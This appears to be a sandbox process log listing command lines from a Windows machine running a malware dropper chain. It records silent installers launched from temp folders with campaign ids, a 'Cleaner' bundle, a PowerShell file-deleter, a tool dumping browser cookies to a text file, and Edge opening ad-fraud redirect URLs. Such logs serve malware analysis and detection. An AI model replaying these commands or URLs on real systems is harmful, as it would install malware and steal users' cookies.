C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4804 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 5160 -ip 5160
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533762 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5160 -s 2468
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4804 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5712 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9f41846f8,0x7ff9f4184708,0x7ff9f4184718
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lvbtwuyu.ewm\GcleanerEU.exe /eufive & exit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tnfzfqzt.xyz\installer.exe /qn CAMPAIGN="654" & exit
C:\Users\Admin\AppData\Local\Temp\tnfzfqzt.xyz\installer.exe
C:\Users\Admin\AppData\Local\Temp\tnfzfqzt.xyz\installer.exe /qn CAMPAIGN="654"
C:\Users\Admin\AppData\Local\Temp\lvbtwuyu.ewm\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\lvbtwuyu.ewm\GcleanerEU.exe /eufive
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yzec1bpe.zhd\ufgaa.exe & exit
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6168 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3836 -ip 3836
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3836 -s 276
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 7F8ED4812D1FC6B26DBB02A39C063041 C
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6244 /prefetch:1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nxgt0mdr.ssl\anyname.exe & exit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uousy3rf.wn3\gcleaner.exe /mixfive & exit
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\nxgt0mdr.ssl\anyname.exe
C:\Users\Admin\AppData\Local\Temp\nxgt0mdr.ssl\anyname.exe
C:\Users\Admin\AppData\Local\Temp\uousy3rf.wn3\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\uousy3rf.wn3\gcleaner.exe /mixfive
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\tnfzfqzt.xyz\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\tnfzfqzt.xyz\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533762 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
C:\Users\Admin\AppData\Local\Temp\nxgt0mdr.ssl\anyname.exe
"C:\Users\Admin\AppData\Local\Temp\nxgt0mdr.ssl\anyname.exe" -q
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 7636 -ip 7636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 5436 -ip 5436
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5436 -s 1580
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7636 -s 280
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tcwiu1l1.eau\autosubplayer.exe /S & exit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5360 /prefetch:2
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_776F.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0xc8,0x210,0x7ffa05b7dec0,0x7ffa05b7ded0,0x7ffa05b7dee0
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x140,0x144,0x148,0x11c,0x14c,0x7ff62c569e70,0x7ff62c569e80,0x7ff62c569e90
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1596,10246240507445112205,5886184292257189685,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8748_385271237" --mojo-platform-channel-handle=1844 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1596,10246240507445112205,5886184292257189685,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8748_385271237" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1612 /prefetch:2
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1596,10246240507445112205,5886184292257189685,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8748_385271237" --mojo-platform-channel-handle=2400 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1596,10246240507445112205,5886184292257189685,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8748_385271237" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2536 /prefetch:1
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1596,10246240507445112205,5886184292257189685,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8748_385271237" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2544 /prefetch:1
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1596,10246240507445112205,5886184292257189685,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8748_385271237" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3220 /prefetch:2
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,10246240507445112205,5886184292257189685,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8748_385271237" --mojo-platform-channel-handle=3324 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,10246240507445112205,5886184292257189685,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8748_385271237" --mojo-platform-channel-handle=2864 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,10246240507445112205,5886184292257189685,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8748_385271237" --mojo-platform-channel-handle=2212 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1596,10246240507445112205,5886184292257189685,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8748_385271237" --mojo-platform-channel-handle=1512 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1c4,0x1c8,0x1cc,0x1c0,0x1d0,0x7ff9f41846f8,0x7ff9f4184708,0x7ff9f4184718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1268 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4484 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1832 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x12c,0x130,0x134,0x100,0x138,0x7ff9f41846f8,0x7ff9f4184708,0x7ff9f4184718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6264 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9f41846f8,0x7ff9f4184708,0x7ff9f4184718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7212 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
